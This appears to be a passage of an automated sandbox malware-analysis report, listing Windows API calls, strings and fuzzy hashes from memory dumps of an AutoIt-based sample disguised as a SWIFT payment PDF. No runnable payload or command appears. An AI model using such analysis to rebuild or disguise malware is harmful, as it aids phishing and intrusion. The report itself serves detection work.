                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                        • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                        • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                        • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                        • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                        • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                        • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                        • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                        • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                        • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                        APIs
                                                        • DeleteObject.GDI32(?), ref: 004593D7
                                                        • DeleteObject.GDI32(?), ref: 004593F1
                                                        • DestroyWindow.USER32(?), ref: 00459407
                                                        • GetDesktopWindow.USER32 ref: 0045942A
                                                        • GetWindowRect.USER32(00000000), ref: 00459431
                                                        • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                        • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                        • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                        • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                        • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                        • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                        • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                        • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                        • GetStockObject.GDI32(00000011), ref: 004597B7
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                        • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                        • DeleteDC.GDI32(00000000), ref: 004597E1
                                                        • _wcslen.LIBCMT ref: 00459800
                                                        • _wcscpy.LIBCMT ref: 0045981F
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                        • GetDC.USER32(?), ref: 004598DE
                                                        • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                        • SelectObject.GDI32(00000000,?), ref: 00459919
                                                        • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                        • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 4040870279-2373415609
                                                        • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                        • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                        • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                        • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 00441E64
                                                        • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                        • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                        • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                        • SelectObject.GDI32(?,?), ref: 00441EBA
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                        • GetSysColor.USER32(00000010), ref: 00441EF8
                                                        • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                        • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                        • DeleteObject.GDI32(?), ref: 00441F1B
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                        • FillRect.USER32(?,?,?), ref: 00441FB6
                                                          • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                          • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                          • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                          • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                          • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                          • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                          • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                          • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                          • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                          • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                          • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                          • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                          • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                        • String ID:
                                                        • API String ID: 69173610-0
                                                        • Opcode ID: 9280a51e69b60a5d42015b6fb8b054263a37d8991f42546addaf9f7842901596
                                                        • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                        • Opcode Fuzzy Hash: 9280a51e69b60a5d42015b6fb8b054263a37d8991f42546addaf9f7842901596
                                                        • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-3360698832
                                                        • Opcode ID: 84a015a89331b948ad80fde2e8286dd20bb1191517786ec4b13764f5676f9e67
                                                        • Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
                                                        • Opcode Fuzzy Hash: 84a015a89331b948ad80fde2e8286dd20bb1191517786ec4b13764f5676f9e67
                                                        • Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
                                                        APIs
                                                        • GetSysColor.USER32(0000000E), ref: 00433D81
                                                        • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                        • GetSysColor.USER32(00000012), ref: 00433DA3
                                                        • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                        • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                        • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                        • GetSysColor.USER32(00000011), ref: 00433DEB
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                        • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                        • SetBkColor.GDI32(?,?), ref: 00433E19
                                                        • SelectObject.GDI32(?,?), ref: 00433E29
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                        • GetWindowLongW.USER32 ref: 00433E8A
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                        • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                        • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                        • GetSysColor.USER32(00000011), ref: 00433F2E
                                                        • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                        • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                        • SelectObject.GDI32(?,?), ref: 00433F63
                                                        • DeleteObject.GDI32(?), ref: 00433F70
                                                        • SelectObject.GDI32(?,?), ref: 00433F78
                                                        • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                        • SetTextColor.GDI32(?,?), ref: 00433F83
                                                        • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1582027408-0
                                                        • Opcode ID: 184f7426315717f97f47252720bf46f27ff793f79603617435c0284882dc4fa9
                                                        • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                        • Opcode Fuzzy Hash: 184f7426315717f97f47252720bf46f27ff793f79603617435c0284882dc4fa9
                                                        • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00456692
                                                        • GetDesktopWindow.USER32 ref: 004566AA
                                                        • GetWindowRect.USER32(00000000), ref: 004566B1
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                        • DestroyWindow.USER32(?), ref: 00456731
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                        • IsWindowVisible.USER32(?), ref: 00456812
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                        • GetWindowRect.USER32(?,?), ref: 0045685C
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                        • GetMonitorInfoW.USER32 ref: 00456894
                                                        • CopyRect.USER32(?,?), ref: 004568A8
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                        • String ID: ($,$tooltips_class32
                                                        • API String ID: 541082891-3320066284
                                                        • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                        • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                        • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                        • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00454DCF
                                                        • _wcslen.LIBCMT ref: 00454DE2
                                                        • __wcsicoll.LIBCMT ref: 00454DEF
                                                        • _wcslen.LIBCMT ref: 00454E04
                                                        • __wcsicoll.LIBCMT ref: 00454E11
                                                        • _wcslen.LIBCMT ref: 00454E24
                                                        • __wcsicoll.LIBCMT ref: 00454E31
                                                          • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                        • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                        • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                        • DestroyIcon.USER32(?), ref: 00454FA2
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 2511167534-1154884017
                                                        • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                        • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                        • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                        • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                        • _wcslen.LIBCMT ref: 00436B79
                                                        • _wcscpy.LIBCMT ref: 00436B9F
                                                        • _wcscat.LIBCMT ref: 00436BC0
                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                        • _wcscat.LIBCMT ref: 00436C2A
                                                        • _wcscat.LIBCMT ref: 00436C31
                                                        • __wcsicoll.LIBCMT ref: 00436C4B
                                                        • _wcsncpy.LIBCMT ref: 00436C62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 1503153545-1459072770
                                                        • Opcode ID: 3116a33cc7546d6acf5ee8a62cc4fa6aaf6c12402d38d1f722c6ad44f58d842e
                                                        • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                        • Opcode Fuzzy Hash: 3116a33cc7546d6acf5ee8a62cc4fa6aaf6c12402d38d1f722c6ad44f58d842e
                                                        • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                        APIs
                                                          • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                        • _fseek.LIBCMT ref: 004527FC
                                                        • __wsplitpath.LIBCMT ref: 0045285C
                                                        • _wcscpy.LIBCMT ref: 00452871
                                                        • _wcscat.LIBCMT ref: 00452886
                                                        • __wsplitpath.LIBCMT ref: 004528B0
                                                        • _wcscat.LIBCMT ref: 004528C8
                                                        • _wcscat.LIBCMT ref: 004528DD
                                                        • __fread_nolock.LIBCMT ref: 00452914
                                                        • __fread_nolock.LIBCMT ref: 00452925
                                                        • __fread_nolock.LIBCMT ref: 00452944
                                                        • __fread_nolock.LIBCMT ref: 00452955
                                                        • __fread_nolock.LIBCMT ref: 00452976
                                                        • __fread_nolock.LIBCMT ref: 00452987
                                                        • __fread_nolock.LIBCMT ref: 00452998
                                                        • __fread_nolock.LIBCMT ref: 004529A9
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                          • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                          • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                        • __fread_nolock.LIBCMT ref: 00452A39
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716761486.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716780693.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1716818701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_z20SWIFT_MT103_Payment_552016_pdf.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                        • String ID:
                                                        • API String ID: 2054058615-0
                                                        • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                        • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                        • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                        • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1716710540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1716693878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
